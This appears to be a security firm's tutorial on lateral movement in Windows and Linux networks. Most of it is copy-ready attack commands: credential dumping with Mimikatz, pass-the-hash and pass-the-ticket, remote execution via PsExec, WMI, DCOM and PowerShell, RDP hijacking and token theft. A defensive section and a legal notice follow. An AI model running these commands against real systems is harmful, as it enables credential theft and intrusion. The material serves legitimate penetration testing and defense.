Lateral Movement Techniques

[Diagram: initial access on Host A (10.0.1.10), then lateral movement to Host B (10.0.1.20) and the Domain Controller DC.domain.local]

Lateral movement refers to techniques attackers use to move through a network after initial compromise, searching for key assets and data. Understanding these techniques is critical for both offensive security testing and defensive operations.


What is Lateral Movement?

Lateral movement is the process of moving from one compromised system to another within a network. Attackers use various techniques to authenticate to remote systems, execute code, and expand their access across the infrastructure.

Pass-the-Hash (PtH)

Pass-the-Hash Attack

Pass-the-Hash allows attackers to authenticate to remote systems using NTLM password hashes without knowing the plaintext password.

# Extract NTLM hashes with Mimikatz (needs local admin; reads credential material out of LSASS memory)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# Format: LM Hash:NT Hash
# Example: aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
# The LM half aad3b435b51404eeaad3b435b51404ee is the hash of an empty LM password (LM storage disabled);
# only the NT half (MD4 of the UTF-16LE password) is needed to authenticate, which is why the tools below accept ':NT' alone.

# Pass-the-Hash with CrackMapExec
crackmapexec smb 10.0.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42'
crackmapexec smb 10.0.1.10 -u admin -H 'hash' -x "whoami"

# Pass-the-Hash with Impacket
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 [email protected]
wmiexec.py -hashes :e19ccf75ee54e06b06a5907af13cef42 [email protected]
smbexec.py -hashes :e19ccf75ee54e06b06a5907af13cef42 [email protected]

# Metasploit PtH
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
set RHOST 10.0.1.10
exploit

Pass-the-Ticket (PtT)

Pass-the-Ticket involves using stolen Kerberos tickets to authenticate to services without needing passwords or hashes.

# Extract Kerberos tickets with Mimikatz
sekurlsa::tickets /export

# List available tickets
kerberos::list

# Inject ticket into current session
kerberos::ptt [0;3e7][email protected]

# Verify ticket injection
klist

# Use Rubeus for ticket manipulation
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:base64ticket

# Linux: Use ticket with impacket (a Mimikatz .kirbi must be converted to ccache first)
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass domain.local/[email protected]

Remote Execution Methods

PsExec

# Sysinternals PsExec
PsExec.exe \\10.0.1.10 -u domain\admin -p password cmd.exe
PsExec.exe \\10.0.1.10 -u admin -p pass -s cmd.exe # Run as SYSTEM

# Impacket psexec.py
psexec.py domain/admin:[email protected]
psexec.py -hashes :ntlmhash domain/[email protected]

# CrackMapExec with command execution
crackmapexec smb 10.0.1.10 -u admin -p password -x "whoami"
crackmapexec smb 10.0.1.10 -u admin -p password -X '$PSVersionTable'

WMI (Windows Management Instrumentation)

# WMI command execution
wmic /node:10.0.1.10 /user:admin /password:pass process call create "cmd.exe /c calc.exe"

# Impacket wmiexec.py
wmiexec.py domain/admin:[email protected]
wmiexec.py -hashes :ntlmhash [email protected]

# PowerShell WMI
$cred = Get-Credential
Invoke-WmiMethod -ComputerName 10.0.1.10 -Credential $cred -Class Win32_Process -Name Create -ArgumentList "powershell.exe"

# CrackMapExec WMI
crackmapexec wmi 10.0.1.10 -u admin -p password -x "whoami"

PowerShell Remoting

# Enable PS Remoting on the target if WinRM is off (run there as an administrator; opens TCP 5985/5986)
Enable-PSRemoting -Force

# Interactive session
$cred = Get-Credential
Enter-PSSession -ComputerName 10.0.1.10 -Credential $cred

# Execute command remotely
Invoke-Command -ComputerName 10.0.1.10 -Credential $cred -ScriptBlock {whoami}

# Execute script remotely
Invoke-Command -ComputerName 10.0.1.10 -Credential $cred -FilePath .\script.ps1

# Multiple hosts
Invoke-Command -ComputerName 10.0.1.10,10.0.1.20 -Credential $cred -ScriptBlock {Get-Process}

DCOM (Distributed Component Object Model)

# MMC20.Application DCOM
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.1.10"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")

# ShellWindows DCOM (no ProgID, so instantiate by CLSID; needs an interactive explorer.exe on the target)
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.0.1.10")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)

# Impacket dcomexec.py
dcomexec.py domain/admin:[email protected]
dcomexec.py -object MMC20 domain/admin:[email protected]

RDP Hijacking

# List RDP sessions (note the session ID to take over and the name of your own session, e.g. rdp-tcp#0)
query user
qwinsta

# Hijack session without password (requires SYSTEM)
# tscon <ID of the session to take over> /dest:<name of your own session>
PsExec.exe -s cmd.exe
tscon 2 /dest:rdp-tcp#0

# Using Mimikatz
privilege::debug
ts::sessions
ts::remote /id:2

# Enable RDP on the target (run in a shell on that host, e.g. one obtained via PsExec or WMI above)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

SSH Lateral Movement (Linux)

# SSH with password
ssh [email protected]
sshpass -p 'password' ssh [email protected]

# SSH with private key
ssh -i /path/to/key [email protected]

# SSH agent forwarding (the agent socket is exposed on the jumphost: anyone with root there can use your keys while you are connected)
ssh -A user@jumphost
ssh user@internal-host # Uses forwarded agent

# SSH without password (key-based; ssh-copy-id authenticates once with the password, then appends the key to authorized_keys)
ssh-keygen -t rsa
ssh-copy-id [email protected]

# Execute command via SSH
ssh [email protected] "whoami; uname -a"

# SCP file transfer
scp file.txt [email protected]:/tmp/
scp [email protected]:/etc/passwd ./

Token Impersonation

# Meterpreter token manipulation (seeing other users' tokens requires SYSTEM or SeDebugPrivilege)
use incognito
list_tokens -u
impersonate_token DOMAIN\\Administrator

# Steal token
steal_token PID

# Revert to original token
rev2self

# PowerShell token stealing
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "DOMAIN\admin"

Defense Strategies

Preventing Lateral Movement

Implementing multiple defensive layers can significantly hinder lateral movement attempts:

  • Credential Hygiene: Use unique local admin passwords (LAPS) so one host's local Administrator hash does not authenticate to its neighbours
  • Privilege Separation: Implement a tiered admin model so domain-admin credentials are never typed into workstations where they can be dumped from LSASS
  • Network Segmentation: Isolate critical assets and block workstation-to-workstation SMB (445), WinRM (5985/5986), RPC/WMI (135 plus dynamic ports) and RDP (3389)
  • Restrict NTLM: Audit NTLM usage first, then block it wherever Kerberos works; Pass-the-Hash needs an NTLM logon to succeed
  • Protected Users Group: Add privileged accounts; members cannot authenticate with NTLM, cannot use RC4 in Kerberos, and have no cached credentials
  • Credential Guard: Enable Windows Defender Credential Guard so NT hashes and Kerberos TGTs are isolated from LSASS-reading tools such as sekurlsa::logonpasswords
  • Just-in-Time Access: Use PAM solutions for temporary elevated access
  • Monitoring: Detect anomalous authentication patterns (for example 4624 logon type 9 from seclogo, one source NTLM-authenticating to many hosts in minutes, 7045 service installs of PSEXESVC)

Legal Notice

Lateral movement techniques should only be used in authorized penetration testing engagements. Unauthorized access to computer systems is illegal.

HackHub Professional Services


Expert Red Team & Lateral Movement Testing

The HackHub team has over 10 years of experience conducting advanced red team operations and lateral movement assessments. We help organizations identify and remediate weaknesses in their internal security controls, Active Directory configurations, and authentication mechanisms.

Contact [email protected] for professional security assessment services.

Conclusion

Lateral movement is a critical phase of post-exploitation that allows attackers to expand their access and reach high-value targets. Understanding these techniques helps both red teams conduct realistic assessments and blue teams implement effective defenses. Regular security testing and continuous monitoring are essential for detecting and preventing lateral movement in enterprise networks.